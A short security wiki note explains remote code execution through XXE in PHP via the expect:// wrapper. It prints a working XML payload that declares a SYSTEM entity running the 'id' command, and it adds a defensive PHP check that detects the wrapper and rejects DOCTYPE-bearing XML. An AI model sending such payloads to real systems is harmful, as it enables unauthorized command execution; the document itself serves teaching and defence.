# RCE via XXE in PHP

*If* you're dealing with [[PHP]], and *if* the [[PHP]] expect module is loaded, and *if* XML inputs aren't properly sanitized, then [defining a SYSTEM entity with the value of `expect://$COMMAND` will get you RCE](https://depthsecurity.com/blog/exploitation-xml-external-entity-xxe-injection) via [[XXE attacks|XXE]].

```xml
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxerce SYSTEM "expect://id">]>
<root>&xxerce;</root>
```

Don't expect to run into this often, however, as this combination of factors is pretty rare.
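
A defender-side check for the preconditions listed above, as an added example that is not part of the original note: it reports whether the `expect://` wrapper is reachable in the running PHP and parses untrusted XML while refusing any document that carries a DOCTYPE. The function names `expectWrapperAvailable` and `parseUntrustedXml` are hypothetical, and the second sample document is constructed.

```php
<?php
// Added example (not from the original note). Function names are hypothetical.

/** True when the expect extension or its stream wrapper is present in this runtime. */
function expectWrapperAvailable(): bool
{
    return extension_loaded('expect')
        || in_array('expect', stream_get_wrappers(), true);
}

/**
 * Parse untrusted XML and return the DOMDocument, or null when the input
 * is malformed or declares a DOCTYPE (the only place entities can be defined).
 */
function parseUntrustedXml(string $xml): ?DOMDocument
{
    $previous = libxml_use_internal_errors(true); // keep parser warnings out of output
    $doc = new DOMDocument();
    // LIBXML_NOENT and LIBXML_DTDLOAD are deliberately not passed, so entity
    // references are not substituted; LIBXML_NONET forbids network access.
    $ok = $doc->loadXML($xml, LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    if (!$ok || $doc->doctype !== null) {
        return null; // reject rather than try to sanitize the DTD
    }
    return $doc;
}

// The first sample is the document from the note above; the second is constructed.
$samples = [
    'doctype with SYSTEM entity' => '<?xml version="1.0"?>'
        . '<!DOCTYPE root [<!ENTITY xxerce SYSTEM "expect://id">]>'
        . '<root>&xxerce;</root>',
    'plain document' => '<?xml version="1.0"?><root>hello</root>',
];

printf("expect wrapper available: %s\n", expectWrapperAvailable() ? 'yes' : 'no');
foreach ($samples as $label => $xml) {
    printf("%s: %s\n", $label, parseUntrustedXml($xml) === null ? 'rejected' : 'accepted');
}
```

Either control on its own breaks the chain the note describes: without the expect wrapper the entity has nothing to execute, and without DOCTYPE support the entity cannot be declared.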